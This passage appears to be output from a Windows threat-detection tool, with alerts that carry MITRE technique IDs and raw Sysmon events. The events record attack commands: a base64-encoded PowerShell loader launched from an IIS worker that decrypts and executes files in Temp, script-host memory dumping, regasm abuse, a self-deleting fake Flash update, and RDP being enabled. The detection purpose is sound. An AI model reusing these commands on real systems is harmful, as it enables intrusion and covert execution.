<Data Name=""Hashes"">SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C</Data>
<Data Name=""ParentProcessGuid"">ECAD0485-8897-5D0C-0000-0010A2FA1C00</Data>
<Data Name=""ParentProcessId"">3964</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1567169648.171875,2019-08-30T16:54:08.171875+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript c:\ProgramData\memdump.vbs notepad.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\System32\cmd.exe) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-30T12:54:07.873789Z"">
</TimeCreated>
<EventRecordID>32151</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3292"" ThreadID=""928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-30 12:54:07.823</Data>
<Data Name=""ProcessGuid"">747F3D96-1C6F-5D69-0000-0010323C1F00</Data>
<Data Name=""ProcessId"">2576</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cscript c:\ProgramData\memdump.vbs notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
<Data Name=""LogonId"">0xe81e5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1B6C-5D69-0000-00106F060F00</Data>
<Data Name=""ParentProcessId"">2128</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436014.411034,2019-07-30T01:33:34.411034+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:34.295068Z"">
</TimeCreated>
<EventRecordID>4922</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:34.216</Data>
<Data Name=""ProcessGuid"">747F3D96-662E-5D3F-0000-001011038900</Data>
<Data Name=""ProcessId"">6020</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556380674.165738,2019-04-27T19:57:54.165738+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c del /q &quot;C:\Users\IEUser\Downloads\Flash_update.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-27T15:57:54.134488Z"">
</TimeCreated>
<EventRecordID>6622</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1912"" ThreadID=""996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1059,technique_name=Command-Line Interface</Data>
<Data Name=""UtcTime"">2019-04-27 15:57:54.087</Data>
<Data Name=""ProcessGuid"">365ABB72-7C02-5CC4-0000-0010FD6E0C00</Data>
<Data Name=""ProcessId"">3188</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c del /q &quot;C:\Users\IEUser\Downloads\Flash_update.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-7AB1-5CC4-0000-0020BEF40000</Data>
<Data Name=""LogonId"">0xf4be</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-7C01-5CC4-0000-00102B3E0C00</Data>
<Data Name=""ParentProcessId"">2680</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Downloads\Flash_update.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Downloads\Flash_update.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,1552853889.282593,2019-03-18T00:18:09.282593+04:00,,Threat,High,[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,13,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>13</EventID>
<Version>2</Version>
<Level>4</Level>
<Task>13</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T20:18:09.282593Z"">
</TimeCreated>
<EventRecordID>5267</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1852"" ThreadID=""464"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""EventType"">SetValue</Data>
<Data Name=""UtcTime"">2019-03-17 20:18:09.272</Data>
<Data Name=""ProcessGuid"">365ABB72-AB70-5C8E-0000-0010DF1F0A00</Data>
<Data Name=""ProcessId"">3700</Data>
<Data Name=""Image"">C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe</Data>
<Data Name=""TargetObject"">HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections</Data>
<Data Name=""Details"">DWORD (0x00000000)</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,"Found User (IIS APPPOOL\DefaultAppPool) run Suspicious PowerShell commands that include ( -enc , -noni ,-noni,-nop,powershell,\Windows\System32,ls, -t , -w ) in event with Command Line (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==) and Parent Image :C:\Windows\System32\inetsrv\w3wp.exe , Parent CommandLine (c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20) in directory : ( C:\Windows\Temp\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:28:42.711005Z"">
</TimeCreated>
<EventRecordID>5875</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:28:42.700</Data>
<Data Name=""ProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ProcessId"">2584</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3251-5CEB-0000-00109E06E100</Data>
<Data Name=""ParentProcessId"">748</Data>
<Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
<Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:13.650211Z"">
</TimeCreated>
<EventRecordID>20</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:13.560</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\hid.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Hid User Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Detect IIS/Exchange Exploitation,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) and commandline ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWw